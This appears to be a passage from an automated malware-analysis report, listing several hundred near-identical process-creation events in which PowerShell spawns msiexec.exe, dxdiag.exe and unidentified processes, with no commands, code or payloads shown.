Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
